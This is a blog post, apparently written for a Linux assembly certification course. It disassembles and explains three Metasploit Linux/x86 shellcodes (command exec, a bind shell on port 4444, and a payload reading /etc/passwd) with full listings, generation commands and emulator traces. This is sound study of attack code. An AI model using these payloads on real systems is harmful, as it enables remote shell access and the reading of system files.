SLAE Assignment 5: Shellcode Analysis

Assignment five is about analyzing three different shellcodes, created with msfpayload for Linux/x86.

linux/x86/exec

I choosed the linux/x86/exec shellcode as first example.

With:

$ msfpayload linux/x86/exec cmd="ls" R | ndisasm -u -

it is possible to disassemble the shellcode:

00000000  6A0B              push byte +0xb
00000002  58                pop eax
00000003  99                cdq
00000004  52                push edx
00000005  66682D63          push word 0x632d
00000009  89E7              mov edi,esp
0000000B  682F736800        push dword 0x68732f
00000010  682F62696E        push dword 0x6e69622f
00000015  89E3              mov ebx,esp
00000017  52                push edx
00000018  E803000000        call dword 0x20
0000001D  6C                insb
0000001E  7300              jnc 0x20
00000020  57                push edi
00000021  53                push ebx
00000022  89E1              mov ecx,esp
00000024  CD80              int 0x80

I will now comment the relevant lines of the shellcode.

00000000  6A0B              push byte +0xb
00000002  58                pop eax

EAX is set to 0xb = 11. This is the number for execve:

$ grep 11 /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_execve              11
... SNIP ...

00000003  99                cdq
00000004  52                push edx

Set edx to zero and push it in the stack for termination.

00000005  66682D63          push word 0x632d

This pushes “-c” on the stack.

00000009  89E7              mov edi,esp

Move the stackpointer to EDI. So EDI is pointing to “-c”.

0000000B  682F736800        push dword 0x68732f
00000010  682F62696E        push dword 0x6e69622f
00000015  89E3              mov ebx,esp

Push /bin/sh to the stack and move the stackpointer to EBX. EBX is pointing to “/bin/sh”.
It can be seen, that the ls command is not executed directly. A shell is called with the -c option. From the bash man page:
“-c string If the -c option is present, then commands are read from string. If there are arguments after the string, they are assigned to the positional parameters, starting with $0.”

00000017  52                push edx

Push some zeros again.

00000018  E803000000        call dword 0x20

This one jumps to 0x20.

00000020  57                push edi
00000021  53                push ebx
00000022  89E1              mov ecx,esp
00000024  CD80              int 0x80

EDI (-c), EBX (/bin/sh) and are pushed on the stack, ECX is moved to ESP and the function is called.

Now here comes the interesting part. It is not possible to get the command “ls” from debugging with gdb nor analyzing it with libemu. But the ls (as hex: 6c 73) command is in the code.

0000001D  6C                insb
0000001E  7300              jnc 0x20

I think that the ls is pushed on the stack too, although the debugger does not notice anything of that… hmpf.

So maybe libemu can help us here.

For analyzing the shellcode with libemu I use:

$ msfpayload linux/x86/exec cmd="ls" R | sctest -vvv -Ss 100000 -G Exec.dot

The ls command should be executed. The output is showing exactly how the execve call is build.

... SNIP ...
[emu 0x0x8f3e088 debug ] Flags: 
int execve (
     const char * dateiname = 0x00416fc0 => 
           = "/bin/sh";
     const char * argv[] = [
           = 0x00416fb0 => 
               = 0x00416fc0 => 
                   = "/bin/sh";
           = 0x00416fb4 => 
               = 0x00416fc8 => 
                   = "-c";
           = 0x00416fb8 => 
               = 0x0041701d => 
                   = "ls";
           = 0x00000000 => 
             none;
     ];
     const char * envp[] = 0x00000000 => 
         none;
) =  0;
... SNIP ...

Here it can be seen, that the “ls” command is on the stack too.

From the Exec.dot file a diagram can be made for illustrating the programm execution.

dot Exec.dot -Tpng -o Exec.dot.png

That was it for the first shellcode.

linux/x86/shell_bind_tcp

For the second shellcode to analyze I choosed linux/x86/shell_bind_tcp. Disassembling works as follows:

$ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | ndisasm -u -

00000000  31DB              xor ebx,ebx
00000002  F7E3              mul ebx
00000004  53                push ebx
00000005  43                inc ebx
00000006  53                push ebx
00000007  6A02              push byte +0x2
00000009  89E1              mov ecx,esp
0000000B  B066              mov al,0x66
0000000D  CD80              int 0x80
0000000F  5B                pop ebx
00000010  5E                pop esi
00000011  52                push edx
00000012  680200115C        push dword 0x5c110002
00000017  6A10              push byte +0x10
00000019  51                push ecx
0000001A  50                push eax
0000001B  89E1              mov ecx,esp
0000001D  6A66              push byte +0x66
0000001F  58                pop eax
00000020  CD80              int 0x80
00000022  894104            mov [ecx+0x4],eax
00000025  B304              mov bl,0x4
00000027  B066              mov al,0x66
00000029  CD80              int 0x80
0000002B  43                inc ebx
0000002C  B066              mov al,0x66
0000002E  CD80              int 0x80
00000030  93                xchg eax,ebx
00000031  59                pop ecx
00000032  6A3F              push byte +0x3f
00000034  58                pop eax
00000035  CD80              int 0x80
00000037  49                dec ecx
00000038  79F8              jns 0x32
0000003A  682F2F7368        push dword 0x68732f2f
0000003F  682F62696E        push dword 0x6e69622f
00000044  89E3              mov ebx,esp
00000046  50                push eax
00000047  53                push ebx
00000048  89E1              mov ecx,esp
0000004A  B00B              mov al,0xb
0000004C  CD80              int 0x80

And here is the output from the libemu analysis.

$ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | sctest -vvv -Ss 100000 -G shell_bind_tcp.dot

... SNIP ...
int socket (
     int domain = 2;
     int type = 1;
     int protocol = 0;
) =  14;
int bind (
     int sockfd = 14;
     struct sockaddr_in * my_addr = 0x00416fc2 => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 23569 (port=4444);
             struct in_addr sin_addr = {
                 unsigned long s_addr = 0 (host=0.0.0.0);
             };
             char sin_zero = "       ";
         };
     int addrlen = 16;
) =  0;
int listen (
     int s = 14;
     int backlog = 0;
) =  0;
int accept (
     int sockfd = 14;
     sockaddr_in * addr = 0x00000000 => 
         none;
     int addrlen = 0x00000010 => 
         none;
) =  19;
int dup2 (
     int oldfd = 19;
     int newfd = 14;
) =  14;
int dup2 (
     int oldfd = 19;
     int newfd = 13;
) =  13;
int dup2 (
     int oldfd = 19;
     int newfd = 12;
) =  12;
int dup2 (
     int oldfd = 19;
     int newfd = 11;
) =  11;
int dup2 (
     int oldfd = 19;
     int newfd = 10;
) =  10;
int dup2 (
     int oldfd = 19;
     int newfd = 9;
) =  9;
int dup2 (
     int oldfd = 19;
     int newfd = 8;
) =  8;
int dup2 (
     int oldfd = 19;
     int newfd = 7;
) =  7;
int dup2 (
     int oldfd = 19;
     int newfd = 6;
) =  6;
int dup2 (
     int oldfd = 19;
     int newfd = 5;
) =  5;
int dup2 (
     int oldfd = 19;
     int newfd = 4;
) =  4;
int dup2 (
     int oldfd = 19;
     int newfd = 3;
) =  3;
int dup2 (
     int oldfd = 19;
     int newfd = 2;
) =  2;
int dup2 (
     int oldfd = 19;
     int newfd = 1;
) =  1;
int dup2 (
     int oldfd = 19;
     int newfd = 0;
) =  0;
int execve (
     const char * dateiname = 0x00416fb2 => 
           = "/bin//sh";
     const char * argv[] = [
           = 0x00416faa => 
               = 0x00416fb2 => 
                   = "/bin//sh";
           = 0x00000000 => 
             none;
     ];
     const char * envp[] = 0x00000000 => 
         none;
) =  0;
... SNIP ...

I analyze the relevant parts of the shellcode, I will use both, the disassembly and the libemu output for further explanation.

00000000  31DB              xor ebx,ebx
00000002  F7E3              mul ebx
00000004  53                push ebx
00000005  43                inc ebx
00000006  53                push ebx
00000007  6A02              push byte +0x2
00000009  89E1              mov ecx,esp
0000000B  B066              mov al,0x66
0000000D  CD80              int 0x80

First the EBX and the EAX registers are filled with zeros. EBX is pushed on the stack, then EBX is set to one and again pushed on the stack. After this two is pushed on the stack. After this the stack address is set to ECX, and EAX is 66. This is the syscall (102) for the socketcall function, which is called afterward. In this case the socket() functions is executed. The rorresponding libemu output:

int socket (
     int domain = 2;
     int type = 1;
     int protocol = 0;
) =  14;

0000000F  5B                pop ebx
00000010  5E                pop esi
00000011  52                push edx
00000012  680200115C        push dword 0x5c110002
00000017  6A10              push byte +0x10
00000019  51                push ecx
0000001A  50                push eax
0000001B  89E1              mov ecx,esp
0000001D  6A66              push byte +0x66
0000001F  58                pop eax
00000020  CD80              int 0x80

To shorten things a little, this part calls the bind function (which is EAX syscall 102 and EBX 1 = SYS_SOCKET = socket() ).
This correspondence with the libemu output (the whole output can be seen below).

int bind (
     int sockfd = 14;
     struct sockaddr_in * my_addr = 0x00416fc2 => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 23569 (port=4444);
             struct in_addr sin_addr = {
                 unsigned long s_addr = 0 (host=0.0.0.0);
             };
             char sin_zero = "       ";
         };
     int addrlen = 16;
) =  0;

5c11 is port 4444 btw.

00000022  894104            mov [ecx+0x4],eax
00000025  B304              mov bl,0x4
00000027  B066              mov al,0x66
00000029  CD80              int 0x80

Here EAX = ffffff66 and EBX = 4, this is defining the listen() function.

$ less /usr/include/linux/net.h | grep 4
#define SYS_LISTEN      4               /* sys_listen(2)                */

Here is the libemu output:

int listen (
     int s = 14;
     int backlog = 0;
) =  0;

0000002B  43                inc ebx
0000002C  B066              mov al,0x66
0000002E  CD80              int 0x80

EBX is now 5, which defines the accept function…

int accept (
     int sockfd = 14;
     sockaddr_in * addr = 0x00000000 => 
         none;
     int addrlen = 0x00000010 => 
         none;
) =  19;

00000030  93                xchg eax,ebx
00000031  59                pop ecx
00000032  6A3F              push byte +0x3f
00000034  58                pop eax
00000035  CD80              int 0x80
00000037  49                dec ecx
00000038  79F8              jns 0x32

EAX = 3f = 63, this is the syscall for dup2.

$ grep 63 /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_dup2                63

This procedure is repeated until ECX=0, so we have any descriptor included.

0000003A  682F2F7368        push dword 0x68732f2f
0000003F  682F62696E        push dword 0x6e69622f
00000044  89E3              mov ebx,esp
00000046  50                push eax
00000047  53                push ebx
00000048  89E1              mov ecx,esp
0000004A  B00B              mov al,0xb
0000004C  CD80              int 0x80

Finally we have the execve call. This works pretty much as in the analysis of the linux/x86/exec shellcode.

int execve (
     const char * dateiname = 0x00416fb2 => 
           = "/bin//sh";
     const char * argv[] = [
           = 0x00416faa => 
               = 0x00416fb2 => 
                   = "/bin//sh";
           = 0x00000000 => 
             none;
     ];
     const char * envp[] = 0x00000000 => 
         none;
) =  0;

I also used the debugger for analyzing the shellcode, but I think the output there is no more help.

And finally the flowchart.

$ dot shell_bind_tcp.dot -Tpng -o shell_bind_tcp.dot.png

So that was it for the second analysis.

linux/x86/read_file

So let us start by disassembling the shellcode:

$ sudo msfpayload linux/x86/read_file PATH="/etc/passwd" R | ndisasm -u -

00000000  EB36              jmp short 0x38
00000002  B805000000        mov eax,0x5
00000007  5B                pop ebx
00000008  31C9              xor ecx,ecx
0000000A  CD80              int 0x80
0000000C  89C3              mov ebx,eax
0000000E  B803000000        mov eax,0x3
00000013  89E7              mov edi,esp
00000015  89F9              mov ecx,edi
00000017  BA00100000        mov edx,0x1000
0000001C  CD80              int 0x80
0000001E  89C2              mov edx,eax
00000020  B804000000        mov eax,0x4
00000025  BB01000000        mov ebx,0x1
0000002A  CD80              int 0x80
0000002C  B801000000        mov eax,0x1
00000031  BB00000000        mov ebx,0x0
00000036  CD80              int 0x80
00000038  E8C5FFFFFF        call dword 0x2
0000003D  2F                das
0000003E  657463            gs jz 0xa4
00000041  2F                das
00000042  7061              jo 0xa5
00000044  7373              jnc 0xb9
00000046  7764              ja 0xac
00000048  00                db 0x00

Libemu and sctest did not work for me. So I will only look at the disassembly and debugging.

First things first: The shellcode is using the JMP-CALL-POP technique. This can be seen very good by stepping throught the code but also by having a look at the disassembled code.

00000000  EB36              jmp short 0x38

Jump to address 0x38.

00000038  E8C5FFFFFF        call dword 0x2
0000003D  2F                das
0000003E  657463            gs jz 0xa4
00000041  2F                das
00000042  7061              jo 0xa5
00000044  7373              jnc 0xb9
00000046  7764              ja 0xac
00000048  00                db 0x00

Call 0x2. Be aware 3D – 48 is a data section. Here is nothing else as the path: /etc/passwd.

00000002  B805000000        mov eax,0x5
00000007  5B                pop ebx
00000008  31C9              xor ecx,ecx
0000000A  CD80              int 0x80

Move 5 to EAX for syscall 5, which is open(). Point EBX to /etc/passwd, and execute. Return the file descriptor to EAX, for example 3.

0000000C  89C3              mov ebx,eax
0000000E  B803000000        mov eax,0x3
00000013  89E7              mov edi,esp
00000015  89F9              mov ecx,edi
00000017  BA00100000        mov edx,0x1000
0000001C  CD80              int 0x80

Here the syscall for read() is executed. For this, EAX and EBX are set to 3. EBX contains the file descriptor, ECX points EDI. EDX which presents the size is set to 1000.

0000001E  89C2              mov edx,eax
00000020  B804000000        mov eax,0x4
00000025  BB01000000        mov ebx,0x1
0000002A  CD80              int 0x80

So finally the result is written (syscall 4 is write()) to the standart output.

0000002C  B801000000        mov eax,0x1
00000031  BB00000000        mov ebx,0x0
00000036  CD80              int 0x80

And exit.

So that was it for the last analysis.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-342

danielsauder